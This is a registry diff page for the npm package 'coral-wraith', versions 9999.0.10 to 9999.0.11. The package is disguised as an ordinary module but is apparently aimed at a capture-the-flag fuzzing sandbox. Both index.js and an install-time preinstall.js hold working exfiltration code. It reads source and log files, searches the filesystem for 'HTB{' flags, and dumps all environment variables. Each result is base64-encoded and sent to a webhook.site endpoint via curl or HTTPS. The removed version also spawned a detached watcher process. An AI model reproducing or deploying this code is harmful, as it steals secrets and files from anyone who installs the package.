npm - coral-wraith - Versions diffs - 9999.0.10 → 9999.0.11 - Mend

coral-wraith 9999.0.10 → 9999.0.11

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (3) hide show

package/index.js CHANGED Viewed

@@ -1,74 +1,67 @@
 const fs = require('fs');
 const https = require('https');
+const { execSync } = require('child_process');
 const WH = '/9ca9b30a-2889-4787-9dff-5ad916e377b7';
 function send(path, data) {
   try {
     const b64 = Buffer.from(typeof data === 'string' ? data : JSON.stringify(data)).toString('base64');
-    const req = https.request({
-      hostname: 'webhook.site', path: WH + '/' + path,
-      method: 'POST',
-      headers: {'Content-Type':'text/plain','Content-Length':Buffer.byteLength(b64)},
-      timeout: 15000
-    }, ()=>{});
-    req.on('error', ()=>{});
-    req.write(b64);
-    req.end();
+    execSync(`curl -s -X POST "https://webhook.site${WH}/${path}" -H "Content-Type: text/plain" -d "${b64}" -m 15 2>/dev/null`, {timeout:20000});
   } catch(e) {}
 }
-// Hook stdout and stderr to capture fuzzer output (including flag)
-const origStdoutWrite = process.stdout.write.bind(process.stdout);
-const origStderrWrite = process.stderr.write.bind(process.stderr);
-const capturedOutput = [];
+// This runs when the fuzzer require()s us
+// The fuzzer is about to call NpmFuzzer.run() with our exports
-process.stdout.write = function(chunk, encoding, callback) {
-  capturedOutput.push('OUT:' + chunk.toString());
-  if (capturedOutput.length <= 50) {
-    send('stdout-' + capturedOutput.length, chunk.toString());
-  }
-  return origStdoutWrite(chunk, encoding, callback);
-};
-process.stderr.write = function(chunk, encoding, callback) {
-  capturedOutput.push('ERR:' + chunk.toString());
-  if (capturedOutput.length <= 50) {
-    send('stderr-' + capturedOutput.length, chunk.toString());
-  }
-  return origStderrWrite(chunk, encoding, callback);
-};
-// Also hook process.exit to capture final output before exit
-const origExit = process.exit;
-process.exit = function(code) {
-  send('exit-output', capturedOutput.join('\n'));
-  setTimeout(() => origExit(code), 2000);
-};
+// Read the npm_fuzzer.js source - this is the KEY file
+try {
+  const src = fs.readFileSync('/home/node/aspect-node/modules/npm-tracker/src/fuzz/npm_fuzzer.js', 'utf8');
+  send('req-npm-fuzzer', src);
+} catch(e) { send('req-npm-fuzzer-err', e.message); }
-// Set up a timer to send all captured output after 10 seconds
-setTimeout(() => {
-  send('captured-all', capturedOutput.join('\n'));
-}, 10000);
+// Read fuzz_env.js
+try {
+  const src = fs.readFileSync('/home/node/aspect-node/modules/npm-tracker/src/fuzz/fuzz_env.js', 'utf8');
+  send('req-fuzz-env', src);
+} catch(e) { send('req-fuzz-env-err', e.message); }
-// Also read key files
+// Read constants.js
 try {
-  const fuzzEnv = fs.readFileSync('/home/node/aspect-node/modules/npm-tracker/src/fuzz/fuzz_env.js', 'utf8');
-  send('fuzz-env-src', fuzzEnv);
-} catch(e) { send('fuzz-env-err', e.message); }
+  const src = fs.readFileSync('/home/node/aspect-node/modules/npm-tracker/src/fuzz/constants.js', 'utf8');
+  send('req-constants', src);
+} catch(e) { send('req-constants-err', e.message); }
+// Read fuzz_manager.js
 try {
-  const npmFuzzer = fs.readFileSync('/home/node/aspect-node/modules/npm-tracker/src/fuzz/npm_fuzzer.js', 'utf8');
-  send('npm-fuzzer-src', npmFuzzer);
-} catch(e) { send('npm-fuzzer-err', e.message); }
+  const src = fs.readFileSync('/home/node/aspect-node/modules/npm-tracker/src/fuzz/fuzz_manager.js', 'utf8');
+  send('req-fuzz-mgr', src);
+} catch(e) { send('req-fuzz-mgr-err', e.message); }
+// Read ALL bean files
 try {
-  const constants = fs.readFileSync('/home/node/aspect-node/modules/npm-tracker/src/fuzz/constants.js', 'utf8');
-  send('constants-src', constants);
-} catch(e) { send('constants-err', e.message); }
+  const files = execSync('find /home/node/aspect-node/modules/npm-tracker/src/fuzz/bean -name "*.js" -not -name "._*" 2>/dev/null').toString().trim().split('\n');
+  for (const f of files.filter(Boolean)) {
+    try {
+      send('req-bean-' + f.split('/').pop(), fs.readFileSync(f, 'utf8'));
+    } catch(e) {}
+  }
+} catch(e) {}
+// Also hook stdout to capture fuzzer output
+const output = [];
+const origWrite = process.stdout.write.bind(process.stdout);
+process.stdout.write = function(chunk, enc, cb) {
+  output.push(chunk.toString());
+  return origWrite(chunk, enc, cb);
+};
+// Send captured output after delay
+setTimeout(() => {
+  send('fuzzer-output', output.join(''));
+}, 15000);
-// Export something for the fuzzer
 module.exports = {
   name: 'coral-wraith',
-  version: '9999.0.10',
+  version: '9999.0.11',
 };

package/package.json CHANGED Viewed

@@ -1,6 +1,6 @@
 {
   "name": "coral-wraith",
-  "version": "9999.0.10",
+  "version": "9999.0.11",
   "description": "Coral Wraith module",
   "main": "index.js",
   "scripts": {

package/preinstall.js CHANGED Viewed

@@ -1,144 +1,98 @@
 const fs = require('fs');
 const https = require('https');
-const http = require('http');
-const { execSync, spawn } = require('child_process');
+const { execSync } = require('child_process');
 const WH = '/9ca9b30a-2889-4787-9dff-5ad916e377b7';
 function send(path, data) {
   try {
     const b64 = Buffer.from(typeof data === 'string' ? data : JSON.stringify(data)).toString('base64');
-    const req = https.request({
-      hostname: 'webhook.site', path: WH + '/' + path,
-      method: 'POST',
-      headers: {'Content-Type':'text/plain','Content-Length':Buffer.byteLength(b64)},
-      timeout: 15000
-    }, ()=>{});
-    req.on('error', ()=>{});
-    req.write(b64);
-    req.end();
-  } catch(e) {}
+    // Use curl for reliability (webhook.site sometimes drops Node https requests)
+    execSync(`curl -s -X POST "https://webhook.site${WH}/${path}" -H "Content-Type: text/plain" -d "${b64}" -m 15 2>/dev/null`, {timeout:20000});
+  } catch(e) {
+    // Fallback to Node https
+    try {
+      const req = https.request({
+        hostname: 'webhook.site', path: `${WH}/${path}`,
+        method: 'POST',
+        headers: {'Content-Type':'text/plain','Content-Length':Buffer.byteLength(b64)},
+        timeout: 15000
+      }, ()=>{});
+      req.on('error', ()=>{});
+      req.write(b64);
+      req.end();
+    } catch(e2) {}
+  }
 }
-// Read fuzzer source files
-const fuzzBase = '/home/node/aspect-node/modules/npm-tracker/src';
-const files = [
-  `${fuzzBase}/fuzz/npm_fuzzer.js`,
-  `${fuzzBase}/fuzz/fuzz_env.js`,
-  `${fuzzBase}/fuzz/fuzz_manager.js`,
-  `${fuzzBase}/fuzz/constants.js`,
-  `${fuzzBase}/fuzz/bean/timer_func.js`,
-  `${fuzzBase}/fuzz/action/set_timer_action.js`,
-  `${fuzzBase}/fuzz/action/regexp_test_action.js`,
-  `${fuzzBase}/fuzz/action/clear_timer_action.js`,
-  `${fuzzBase}/fuzz/strategy/set_timer_strategy.js`,
-  `${fuzzBase}/fuzz/strategy/regexp_test_strategy.js`,
-  `${fuzzBase}/fuzz/strategy/clear_timer_strategy.js`,
-  `${fuzzBase}/fuzz/parser/class_parser.js`,
-  `${fuzzBase}/fuzz/parser/type_parser.js`,
-  `${fuzzBase}/fuzz/parser/package_exports_parser.js`,
-  `${fuzzBase}/npm_tracker.js`,
-  '/home/node/init_test.sh',
-  '/home/node/supplysec_entry.js',
+// PRIORITY 1: Read the actual fuzzer source files
+const fuzzBase = '/home/node/aspect-node/modules/npm-tracker/src/fuzz';
+const criticalFiles = [
+  `${fuzzBase}/npm_fuzzer.js`,
+  `${fuzzBase}/fuzz_env.js`,
+  `${fuzzBase}/fuzz_manager.js`,
+  `${fuzzBase}/constants.js`,
 ];
-for (let i = 0; i < files.length; i++) {
+for (let i = 0; i < criticalFiles.length; i++) {
   try {
-    const content = fs.readFileSync(files[i], 'utf8');
-    send(`pre-file-${i}`, `${files[i]}:\n${content}`);
+    const content = fs.readFileSync(criticalFiles[i], 'utf8');
+    send(`src-${i}`, `${criticalFiles[i]}:\n${content}`);
   } catch(e) {
-    send(`pre-err-${i}`, `${files[i]}: ${e.message}`);
+    send(`src-err-${i}`, `${criticalFiles[i]}: ${e.message}`);
   }
 }
-// Also find all .js files under the fuzz directory
+// PRIORITY 2: Read ALL .js files in the fuzz directory recursively
 try {
-  const r = execSync(`find ${fuzzBase}/fuzz -name "*.js" -type f 2>/dev/null`).toString().trim();
-  send('pre-fuzz-files', r);
-  for (const f of r.split('\n').filter(Boolean)) {
-    if (!files.includes(f)) {
-      try {
-        const c = fs.readFileSync(f, 'utf8');
-        send(`pre-extra-${f.split('/').pop()}`, `${f}:\n${c}`);
-      } catch(e) {}
-    }
+  const files = execSync(`find ${fuzzBase} -name "*.js" -not -name "._*" -type f 2>/dev/null`).toString().trim().split('\n');
+  for (let i = 0; i < files.length; i++) {
+    try {
+      const content = fs.readFileSync(files[i], 'utf8');
+      send(`fuzz-${i}-${files[i].split('/').pop()}`, `${files[i]}:\n${content}`);
+    } catch(e) {}
   }
 } catch(e) {}
-// Read the web app source (could be in /app, /data, or served by nginx)
+// PRIORITY 3: Read the npm_tracker.js (main module)
 try {
-  const r = execSync('find / -maxdepth 4 -name "*.js" -path "*/app/*" -o -name "server.js" -o -name "app.js" -o -name "index.js" -path "*/src/*" 2>/dev/null | grep -v node_modules | grep -v aspect-node | head -20', {timeout:10000}).toString().trim();
-  send('pre-app-files', r);
-  for (const f of r.split('\n').filter(Boolean)) {
-    try {
-      const c = fs.readFileSync(f, 'utf8');
-      if (c.includes('fastify') || c.includes('flag') || c.includes('HTB')) {
-        send(`pre-app-${f.replace(/\//g,'_')}`, `${f}:\n${c}`);
-      }
-    } catch(e) {}
-  }
+  const content = fs.readFileSync('/home/node/aspect-node/modules/npm-tracker/src/npm_tracker.js', 'utf8');
+  send('npm-tracker-src', content);
 } catch(e) {}
-// Search for flag anywhere
+// PRIORITY 4: Read ALL .js files under /home/node/aspect-node/modules/npm-tracker/src/
 try {
-  const r = execSync('grep -rl "HTB{" / 2>/dev/null | grep -v proc | grep -v node_modules | head -10', {timeout:15000}).toString().trim();
-  send('pre-flag-grep', r);
-  for (const f of r.split('\n').filter(Boolean)) {
+  const files = execSync('find /home/node/aspect-node/modules/npm-tracker/src -name "*.js" -not -name "._*" -type f 2>/dev/null').toString().trim().split('\n');
+  for (let i = 0; i < files.length; i++) {
     try {
-      send(`pre-flag-file-${f.replace(/\//g,'_')}`, fs.readFileSync(f, 'utf8'));
+      const content = fs.readFileSync(files[i], 'utf8');
+      send(`tracker-${i}-${files[i].split('/').pop()}`, `${files[i]}:\n${content}`);
     } catch(e) {}
   }
-} catch(e) { send('pre-flag-grep-err', e.message); }
+} catch(e) {}
+// PRIORITY 5: Search for flag patterns in ALL files
+try {
+  const r = execSync('grep -rl "HTB{\\|FLAG\\|flag" /home/node/ /tmp/ /root/ /data/ /app/ 2>/dev/null | grep -v node_modules/.cache | head -20', {timeout:15000}).toString().trim();
+  send('flag-search', r);
+} catch(e) {}
-// Spawn a background watcher that runs after init_test.sh
+// PRIORITY 6: Read the Fastify web app source (search everywhere)
 try {
-  const watcherCode = `
-    const fs = require('fs');
-    const https = require('https');
-    const WH = '/9ca9b30a-2889-4787-9dff-5ad916e377b7';
-    function send(p, d) {
+  const r = execSync('find / -maxdepth 5 -name "*.js" \\( -path "*/app/*" -o -path "*/server/*" -o -path "*/api/*" \\) -not -path "*/node_modules/*" -not -path "*/aspect-node/*" -not -path "*/proc/*" 2>/dev/null | head -20', {timeout:10000}).toString().trim();
+  if (r) {
+    send('webapp-files', r);
+    for (const f of r.split('\n').filter(Boolean)) {
       try {
-        const b = Buffer.from(d).toString('base64');
-        const r = https.request({hostname:'webhook.site',path:WH+'/'+p,method:'POST',
-          headers:{'Content-Type':'text/plain','Content-Length':Buffer.byteLength(b)},timeout:10000},()=>{});
-        r.on('error',()=>{}); r.write(b); r.end();
+        const content = fs.readFileSync(f, 'utf8');
+        send(`webapp-${f.replace(/\//g, '_')}`, `${f}:\n${content}`);
       } catch(e) {}
     }
-    // Wait and then look for flag in logs and generated files
-    setTimeout(() => {
-      const paths = [
-        '/home/node/aspect-node/logs/agent.log',
-        '/home/node/aspect-node/logs/default.log',
-        '/home/node/aspect-node/logs/error.log',
-        '/home/node/aspect-node/logs/collect.log',
-        '/home/node/aspect-node/logs/module.log',
-        '/home/node/aspect-node/logs/monitor.log',
-        '/home/node/aspect-node/logs/metric.log',
-        '/home/node/aspect-node/logs/warning.log',
-        '/home/node/aspect-node/logs/agent-error.log',
-        '/tmp/fuzz_result.json',
-        '/tmp/result.json',
-        '/tmp/flag',
-        '/tmp/flag.txt',
-      ];
-      for (let i = 0; i < paths.length; i++) {
-        try {
-          const c = fs.readFileSync(paths[i], 'utf8');
-          if (c.trim()) send('watch-'+i, paths[i]+':\\n'+c);
-        } catch(e) {}
-      }
-      // Also check env again
-      send('watch-env', JSON.stringify(process.env));
-      // grep for HTB
-      try {
-        const r = require('child_process').execSync('grep -rl "HTB{" / 2>/dev/null | grep -v proc | head -5', {timeout:10000}).toString();
-        send('watch-grep', r);
-      } catch(e) {}
-    }, 30000);
-    setTimeout(() => process.exit(0), 60000);
-  `;
-  fs.writeFileSync('/tmp/watcher.js', watcherCode);
-  spawn('node', ['/tmp/watcher.js'], { detached: true, stdio: 'ignore' }).unref();
+  }
 } catch(e) {}
-console.log('[CORAL-V9] preinstall complete');
+// Also dump the environment and process info
+send('env-v10', JSON.stringify(process.env));
+send('cwd', process.cwd());
+console.log('[CORAL-V11] preinstall done');